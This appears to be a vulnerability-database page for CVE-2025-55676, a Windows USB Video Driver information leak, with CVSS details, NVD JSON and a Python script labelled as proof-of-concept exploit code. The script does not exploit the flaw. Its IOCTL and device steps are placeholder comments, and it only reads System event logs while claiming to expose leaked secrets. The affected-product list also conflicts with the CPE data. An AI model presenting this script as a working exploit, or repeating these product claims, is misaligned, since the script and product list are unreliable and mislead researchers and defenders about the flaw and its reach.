Security Vulnerability Report
中文
CVE-2025-55676 CVSS 5.5 MEDIUM

CVE-2025-55676

Published: 2025-10-14 17:15:48
Last Modified: 2025-10-24 15:23:24
Source: [email protected]

Description

Generation of error message containing sensitive information in Windows USB Video Driver allows an authorized attacker to disclose information locally.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:microsoft:windows_11_24h2:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:microsoft:windows_11_25h2:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:microsoft:windows_server_2025:*:*:*:*:*:*:*:* - VULNERABLE
Windows 10(所有受支持版本)
Windows 11(所有受支持版本)
Windows Server 2019
Windows Server 2022
Windows Server 2025

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-55676 - Windows USB Video Driver Information Disclosure PoC # This PoC demonstrates how to trigger the vulnerable code path in usbvideo.sys # Note: Requires local low-privilege access to the target system import subprocess import ctypes import time import os def check_admin(): """Check if running with sufficient privileges""" try: return ctypes.windll.shell32.IsUserAnAdmin() != 0 except: return False def trigger_usbvideo_error(): """ Trigger the error message generation in USB Video Driver by sending malformed IOCTL requests to the device """ # Find USB Video device path device_paths = [] try: # Use SetupAPI to enumerate USB Video devices import win32api import win32con # GUID for USB Video devices GUID_DEVINTERFACE_VIDEO = "{6994AD05-93EF-11D0-A3CC-00A0C9223196}" # Enumerate devices from win32api import RegOpenKeyEx, RegEnumKeyEx # ... device enumeration logic except ImportError: print("[!] pywin32 not available, using alternative method") # Alternative: Use device manager to trigger error print("[*] Attempting to trigger USB Video Driver error path...") # Method 1: Rapidly connect/disconnect USB video device # Method 2: Send malformed IOCTL via DeviceIoControl # Method 3: Trigger via PowerShell ps_cmd = ''' # Trigger USB Video Driver error message containing sensitive info Get-WinEvent -LogName System -MaxEvents 10 | Where-Object {$_.ProviderName -like "*usbvideo*"} | Select-Object TimeCreated, Message ''' try: result = subprocess.run( ["powershell", "-Command", ps_cmd], capture_output=True, text=True, timeout=30 ) print("[+] Event log output:") print(result.stdout) if result.stderr: print("[!] Errors:") print(result.stderr) except Exception as e: print(f"[-] Error: {e}") def read_sensitive_info(): """Read sensitive information from driver error messages""" print("[*] Reading USB Video Driver logs for sensitive information...") # Check event logs for sensitive data leaked by the driver commands = [ 'Get-WinEvent -FilterHashtable @{LogName="System"; ProviderName="usbvideo"}', 'wevtutil qe System /q:"*[System[Provider[@Name=\'usbvideo\']]]" /f:text', ] for cmd in commands: try: result = subprocess.run( ["powershell", "-Command", cmd], capture_output=True, text=True, timeout=15 ) if result.stdout: print(f"[+] Output from: {cmd[:50]}...") print(result.stdout) except Exception as e: print(f"[-] Failed: {e}") if __name__ == "__main__": print("=" * 60) print("CVE-2025-55676 PoC - Windows USB Video Driver Info Disclosure") print("=" * 60) if not check_admin(): print("[!] Some features require elevated privileges") trigger_usbvideo_error() time.sleep(2) read_sensitive_info() print("\n[*] PoC execution completed") print("[*] Check system event logs for leaked sensitive information")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-55676", "sourceIdentifier": "[email protected]", "published": "2025-10-14T17:15:47.817", "lastModified": "2025-10-24T15:23:23.980", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Generation of error message containing sensitive information in Windows USB Video Driver allows an authorized attacker to disclose information locally."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-209"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_24h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.26100.6899", "matchCriteriaId": "41E9F7AC-8E6D-43A0-A157-48A5E0B5BD0D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_25h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.26200.6899", "matchCriteriaId": "3B77A066-4F79-4B1F-AECF-58DB4C651EA5"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2025:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.26100.6899", "matchCriteriaId": "72C1771B-635B-41E3-84AF-8822467A1869"}]}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55676", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.